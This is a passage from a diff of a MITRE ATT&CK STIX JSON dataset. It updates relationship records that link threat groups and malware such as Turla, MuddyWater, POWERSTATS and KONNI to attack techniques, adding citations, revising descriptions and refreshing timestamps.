- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"type": "relationship",
- "modified": "2020-03-19T18:07:50.071Z",
+ "modified": "2020-06-23T19:56:50.231Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -71194,12 +72247,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688"
},
{
"id": "relationship--66f5e718-f910-487f-852a-98a8d752b0ba",
@@ -71356,7 +72409,7 @@
{
"id": "relationship--e2675622-ec8e-4894-9f5e-3c82944e3019",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.(Citation: Kaspersky Turla)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the systeminfo, gpresult, and set commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -71365,13 +72418,18 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
"source_name": "Kaspersky Turla"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.980Z",
+ "modified": "2020-06-29T02:52:31.812Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -71519,12 +72577,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--a4a49b56-e220-4a81-a0da-43b63c012cfe",
@@ -71676,22 +72734,32 @@
{
"id": "relationship--63d53308-7d7d-4777-a1cc-c7100735609c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: MTrends 2016)",
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "source_name": "MTrends 2016"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
+ "source_name": "FireEye BOOTRASH SANS",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf",
+ "description": "Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020."
}
],
"source_ref": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
"relationship_type": "uses",
"target_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
"type": "relationship",
- "modified": "2019-12-20T14:31:10.700Z",
+ "modified": "2020-05-07T22:29:30.674Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -72433,7 +73501,7 @@
{
"id": "relationship--927e8d82-d094-4170-bc76-10717ffd8d7f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP and network adapter configuration information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -72442,13 +73510,18 @@
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.016Z",
+ "modified": "2020-05-18T19:37:52.427Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -72679,12 +73752,12 @@
"url": "https://github.com/hfiref0x/UACME"
}
],
- "source_ref": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073"
},
{
"id": "relationship--992ffd2b-bac7-418c-a401-b2be739818c9",
@@ -72852,12 +73925,12 @@
"url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/"
}
],
- "source_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c"
},
{
"id": "relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25",
@@ -73156,16 +74229,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.144Z",
+ "modified": "2020-05-14T15:14:33.567Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -73320,30 +74392,30 @@
{
"id": "relationship--5c2cd95f-9c3a-4893-9a5f-960cfed62572",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon\u2019s Invoke-Obfuscation framework.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used Daniel Bohannon\u2019s Invoke-Obfuscation framework.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "GitHub Invoke-Obfuscation",
+ "url": "https://github.com/danielbohannon/Invoke-Obfuscation",
"description": "Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.",
- "url": "https://github.com/danielbohannon/Invoke-Obfuscation"
+ "source_name": "GitHub Invoke-Obfuscation"
},
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
@@ -73351,16 +74423,21 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.625Z",
+ "modified": "2020-05-18T17:29:31.216Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -73442,19 +74519,23 @@
"target_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
"source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
- "description": "(Citation: DustySky)(Citation: DustySky2)",
+ "description": "(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.150Z",
+ "modified": "2020-05-14T14:30:09.805Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
@@ -73785,12 +74866,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -74043,7 +75124,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
- "modified": "2019-07-25T11:35:23.395Z",
+ "modified": "2020-07-14T19:45:59.762Z",
"created": "2017-05-31T21:33:27.027Z"
},
{
@@ -74297,15 +75378,20 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"id": "relationship--c5d09de5-7a1e-45b5-a7ac-1637e8fe8eff",
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T19:11:24.823Z",
+ "modified": "2020-05-18T19:37:52.438Z",
"created": "2019-01-30T17:13:11.872Z"
},
{
@@ -74481,27 +75567,6 @@
"modified": "2020-03-16T16:44:48.808Z",
"created": "2019-01-30T13:53:14.891Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Cybereason Oceanlotus May 2017",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
- }
- ],
- "description": "[Denis](https://attack.mitre.org/software/S0354) uses port 53 for C2 communications.(Citation: Cybereason Oceanlotus May 2017)",
- "id": "relationship--c19e5c83-39fb-433b-a563-9f2390a9d51a",
- "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-04-24T20:56:04.632Z",
- "created": "2019-01-30T20:01:45.529Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -74686,12 +75751,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "intrusion-set--9559ecaf-2e75-48a7-aee8-9974020bc772",
- "relationship_type": "revoked-by",
- "target_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "intrusion-set--9559ecaf-2e75-48a7-aee8-9974020bc772",
+ "relationship_type": "revoked-by",
+ "target_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0"
},
{
"id": "relationship--4b45b720-a606-4c52-a28a-2ef298f9b42f",
@@ -75042,16 +76107,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.650Z",
+ "modified": "2020-04-21T23:09:31.026Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -75564,12 +76629,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475"
},
{
"id": "relationship--73da57b5-e64f-44ee-85f7-d294c21fb534",
@@ -75664,16 +76729,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.049Z",
+ "modified": "2020-05-12T22:13:16.872Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -75837,17 +76902,17 @@
"url": "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/"
}
],
- "source_ref": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--b45c7b78-55c7-4418-ab03-9f805de7376d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -75867,7 +76932,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
"type": "relationship",
- "modified": "2020-03-20T21:27:37.757Z",
+ "modified": "2020-05-21T17:07:02.697Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -75940,12 +77005,12 @@
"url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
}
],
- "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--1ec53623-4050-498b-ba9e-f149d203036c",
@@ -76217,16 +77282,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.642Z",
+ "modified": "2020-04-21T23:09:31.331Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -76257,18 +77322,23 @@
],
"external_references": [
{
- "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.",
+ "source_name": "Talos Konni May 2017",
"url": "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "source_name": "Talos Konni May 2017"
+ "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
- "description": "[KONNI](https://attack.mitre.org/software/S0356) can execute arbitrary commands on the infected host using cmd.exe.(Citation: Talos Konni May 2017)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)",
"id": "relationship--afb593c0-5388-441c-a868-c8bc520ffcaa",
"source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-20T02:11:56.554Z",
+ "modified": "2020-04-28T18:12:13.722Z",
"created": "2019-01-31T00:36:40.984Z"
},
{
@@ -76278,23 +77348,28 @@
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
"source_name": "Cybereason Oceanlotus May 2017"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)",
"id": "relationship--5758382a-2ada-4d05-ad25-8ee802a9e041",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.038Z",
+ "modified": "2020-04-29T15:17:18.826Z",
"created": "2019-01-31T01:07:58.708Z"
},
{
@@ -76695,12 +77770,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
